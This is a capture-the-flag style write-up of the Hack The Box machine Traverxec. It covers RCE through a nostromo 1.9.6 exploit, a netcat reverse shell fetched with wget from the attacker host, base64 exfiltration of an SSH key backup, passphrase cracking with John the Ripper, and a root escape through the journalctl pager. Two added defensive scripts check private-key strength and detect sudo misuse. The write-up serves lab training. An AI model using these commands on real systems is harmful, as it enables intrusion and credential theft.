Commands used
1-nmap -sC -sV -O -v -oA initial 10.10.10.4
2-python getshell.py 10.10.10.165 80 "cd / && mkdir tmp"
3-python getshell.py 10.10.10.165 80 "cd /tmp && wget http://10.10.14.20:8000/nc"
4-python getshell.py 10.10.10.165 80 "/tmp/nc -e /bin/bash 10.10.14.20 4444"
5-cd /home/david/public_www
6-base64 backup-ssh-identity-files.tgz
7-base64 -d file >> newfile
8-/usr/share/john/ssh2john.py id_rsa
9-john hash --wordlist=/root/Desktop/rockyou.txt
10-ssh -i id_rsa [email protected]
11-/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
12-!/bin/bash
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-00-24-13-1024x356.png)
Steps involved
1-Enumeration
2-Exploiting nostromo 1.9.6
3-Getting a complete shell
4-Getting id_rsa for User David
5-Getting the passphrase for id_rsa
6-Getting user.txt
7-Exploiting journalctl (Getting root.txt)
Enumeration
Nmap scan
Nmap 7.70 scan initiated Thu Apr 9 21:41:24 2020 as: nmap -sC -sV -O -p- -v -oV 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.28s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 45.541 days (since Mon Feb 24 07:47:21 2020)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Thu Apr 9 21:46:56 2020 -- 1 IP address (1 host up) scanned in 333.39 seconds
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-21-58-51-1024x400.png)
The first thing that stands out is the uncommon HTTP server version, nostromo 1.9.6.
So let's Google it and look for known exploits.
Exploiting nostromo 1.9.6
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-22-56-49-1024x229.png)
At the top I found the Rapid7 entry for its CVE, so I used that exploit and copied it to my machine as getshell.py.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-22-59-38.png)
Getting a complete shell
This only gives one-line command execution, so let's first get a full shell.
Through it I uploaded nc to the target and then started a reverse shell.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-02-27-1024x528.png)
Before executing this, make sure your Python HTTP server is running.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-03-37.png)
root@nagendra:~/Desktop/htb/traverxec# python getshell.py 10.10.10.165 80 "cd /tmp && chmod +x nc"
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-05-35-1024x313.png)
Now we have a full shell as the www-data user.
Getting id_rsa for User David
After a little enumeration I found the nostromo configuration file:
MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin [email protected]
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
LOGS [OPTIONAL]
logpid logs/nhttpd.pid
SETUID [RECOMMENDED]
user www-data
BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
ALIASES [OPTIONAL]
/icons /var/nostromo/icons
HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
So there is a public_www directory under david's home; let's check it.
cd /home/david/public_www
ls
index.html
protected-file-area
cd protected-file-area
ls
backup-ssh-identity-files.tgz
base64 backup-ssh-identity-files.tgz
I found a backup file; let's download it by base64-encoding it.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-18-11.png)
Then I copied the output into a file on my machine and decoded it:
base64 -d file >> newfile
After extracting the archive I got the id_rsa key for david.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-21-16.png)
Getting the passphrase for id_rsa
To get its passphrase, I first had to convert the key into a hash using ssh2john. Run
locate ssh2john
to find it on your machine.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-24-15-1024x246.png)
Now let's crack the hash with John the Ripper.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-25-42.png)
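How fast a step like this succeeds depends mostly on how the private key is stored on disk: a legacy PEM key ("BEGIN RSA PRIVATE KEY" with a Proc-Type/DEK-Info header) derives its encryption key from the passphrase with a single MD5 pass, so wordlist guessing runs at full speed, whereas the openssh-key-v1 format uses bcrypt with a configurable round count. The following is an added example, not code from this write-up, that inspects a key file and reports which case it is in; the sample keys it checks are constructed (the openssh-key-v1 samples contain only the header fields the parser reads, no key material), and the verdict names and the 16-round threshold (ssh-keygen's default) are my own choices.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
DEFAULT_BCRYPT_ROUNDS = 16  # ssh-keygen's default for -a; anything lower is weaker than stock


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire string (uint32 big-endian length + payload)."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, off: int):
    """Decode an SSH wire string at offset off; return (payload, offset after it)."""
    (length,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + length], off + length


def inspect_private_key(text: str) -> dict:
    """Report format, encryption status, cipher and KDF settings of a PEM-armoured private key."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    head, tail = lines[0], lines[-1]
    if not (head.startswith("-----BEGIN ") and tail.startswith("-----END ")):
        raise ValueError("not a PEM-armoured key")

    if head == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)     # "none" when the key is unencrypted
        kdf, off = _read_string(blob, off)        # "bcrypt" or "none"
        kdfopts, off = _read_string(blob, off)    # bcrypt: string salt + uint32 rounds
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}

    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by RFC 1421 headers
    # and the key is derived from the passphrase with one MD5 pass (EVP_BytesToKey).
    encrypted = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)
    dek = next((ln.split(":", 1)[1].strip() for ln in lines if ln.startswith("DEK-Info:")), None)
    return {"format": "legacy-pem", "encrypted": encrypted,
            "cipher": dek.split(",")[0] if dek else "none",
            "kdf": "md5-single-pass" if encrypted else "none",
            "rounds": 1 if encrypted else None}


def assess(info: dict) -> str:
    """Turn the parsed fields into a one-word verdict for an audit report."""
    if not info["encrypted"]:
        return "UNENCRYPTED"      # whoever copies the file can use it immediately
    if info["format"] == "legacy-pem":
        return "WEAK-KDF"         # offline passphrase guessing runs at full speed
    if info["kdf"] == "bcrypt" and info["rounds"] >= DEFAULT_BCRYPT_ROUNDS:
        return "STRONG-KDF"
    return "LOW-ROUNDS"


# --- constructed samples (no real key material) ---------------------------------

def _armour(name: str, blob: bytes) -> str:
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN {name}-----\n{body}\n-----END {name}-----\n"


def make_openssh_header(cipher: str, kdf: str, rounds: int) -> str:
    """Constructed openssh-key-v1 prefix: magic, cipher, kdf and kdfoptions only."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher.encode())
            + _ssh_string(kdf.encode()) + _ssh_string(kdfopts))
    return _armour("OPENSSH PRIVATE KEY", blob)


SAMPLE_LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

Y29uc3RydWN0ZWQgY2lwaGVydGV4dCBwbGFjZWhvbGRlcg==
-----END RSA PRIVATE KEY-----
"""

SAMPLE_LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
Y29uc3RydWN0ZWQga2V5IG1hdGVyaWFsIHBsYWNlaG9sZGVy
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for label, key in [("legacy encrypted", SAMPLE_LEGACY_ENCRYPTED),
                       ("legacy plain", SAMPLE_LEGACY_PLAIN),
                       ("openssh bcrypt/100", make_openssh_header("aes256-ctr", "bcrypt", 100)),
                       ("openssh bcrypt/8", make_openssh_header("aes256-ctr", "bcrypt", 8))]:
        print(f"{label:20s} {assess(inspect_private_key(key))}")
```

A key that comes back as WEAK-KDF or LOW-ROUNDS can be re-encrypted in place with a higher work factor using `ssh-keygen -p -o -a 100 -f id_rsa`; an UNENCRYPTED key found in a backup under a web-served directory, as here, should simply be replaced.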
Getting User.txt
Now simply log in over SSH and grab the user flag.
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-09-23-27-13.png)
Exploiting journalctl (Getting root.txt)
Now let's do privilege escalation.
I found a server-stats.sh in david's bin directory:
![Hack the box(HTB) Traverxec write up](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-00-04-09.png)
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
I used GTFOBins to abuse this sudo entry: journalctl hands its output to a pager, and entering !/bin/bash at the pager prompt runs a shell as root.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2020-04-09 19:07:20 EDT, end at Fri 2020-04-10 00:11:15 EDT. --
Apr 09 19:07:25 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 09 19:19:00 traverxec sudo[760]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=ww
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): conversation failed
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 09 19:19:03 traverxec sudo[760]: www-data : command not allowed ; TTY=pts/0 ; PWD=/home/david ; USER=root ; COMMAND=list
!/bin/bash
root@traverxec:/home/david/bin# whoami
root
root@traverxec:/home/david/bin# cd /
root@traverxec:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@traverxec:/# cd root
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt
9##################6e0d906
root@traverxec:~#
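The journal lines above already contain what a defender would want to alert on: sudo authentication failures and a "command not allowed" entry coming from the web server's service account, followed by a pager-capable command being run under sudo from an interactive TTY. The following is an added example, not part of this write-up, that runs that detection logic over constructed sample lines modelled on the ones shown (the final "david" line is invented to show the successful-sudo case); the alert kinds and the list of pager-spawning commands are my own choices.

```python
import re

# Constructed sample journal lines modelled on the sudo entries in the write-up.
SAMPLE_JOURNAL = """\
Apr 09 19:07:25 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 09 19:19:00 traverxec sudo[760]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=www-data
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): conversation failed
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 09 19:19:03 traverxec sudo[760]: www-data : command not allowed ; TTY=pts/0 ; PWD=/home/david ; USER=root ; COMMAND=list
Apr 09 23:40:12 traverxec sudo[1201]: david : TTY=pts/1 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
"""

# Accounts that should never be invoking sudo at all (constructed list).
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon"}
# Commands that open $PAGER (and so a shell escape) unless told not to.
PAGER_COMMANDS = {"journalctl", "systemctl", "less", "more", "man"}

SUDO_RE = re.compile(r"^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d) (?P<host>\S+) sudo\[(?P<pid>\d+)\]: (?P<msg>.*)$")
AUTHFAIL_RE = re.compile(r"^pam_unix\(sudo:auth\): authentication failure;.*\bruser=(?P<ruser>\S*)")
DENIED_RE = re.compile(r"^(?P<user>\S+) : command not allowed ; TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")
ALLOWED_RE = re.compile(r"^(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")


def _spawns_pager(cmd: str) -> bool:
    """True if the command's basename is pager-capable and nothing on the line disables it."""
    argv = cmd.split()
    if not argv:
        return False
    name = argv[0].rsplit("/", 1)[-1]
    return name in PAGER_COMMANDS and "--no-pager" not in argv


def analyze(journal_text: str) -> list:
    """Scan journal text for sudo misuse indicators; return one dict per alert, in log order."""
    alerts = []
    for lineno, line in enumerate(journal_text.splitlines(), 1):
        m = SUDO_RE.match(line)
        if not m:
            continue  # only sudo's own records are of interest here
        msg = m.group("msg")

        auth = AUTHFAIL_RE.match(msg)
        if auth and auth.group("ruser") in SERVICE_ACCOUNTS:
            alerts.append({"kind": "sudo_auth_failure", "user": auth.group("ruser"),
                           "line": lineno, "detail": "service account trying sudo"})
            continue

        denied = DENIED_RE.match(msg)
        if denied:
            alerts.append({"kind": "sudo_denied", "user": denied.group("user"),
                           "line": lineno, "command": denied.group("cmd"),
                           "detail": "sudoers refused the request"})
            continue

        ok = ALLOWED_RE.match(msg)
        if ok and ok.group("runas") == "root" and _spawns_pager(ok.group("cmd")):
            alerts.append({"kind": "sudo_pager_capable", "user": ok.group("user"),
                           "line": lineno, "command": ok.group("cmd"),
                           "detail": "root-level command with an interactive pager"})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_JOURNAL):
        print(f"line {a['line']:>3}  {a['kind']:<20} {a['user']:<10} {a['detail']}")
```

The third alert is the one that matters for hardening: a sudoers entry that lets a user run journalctl as root should pin `--no-pager` into the permitted command line, so the rule serves the script's reporting purpose without ever handing the user an interactive pager.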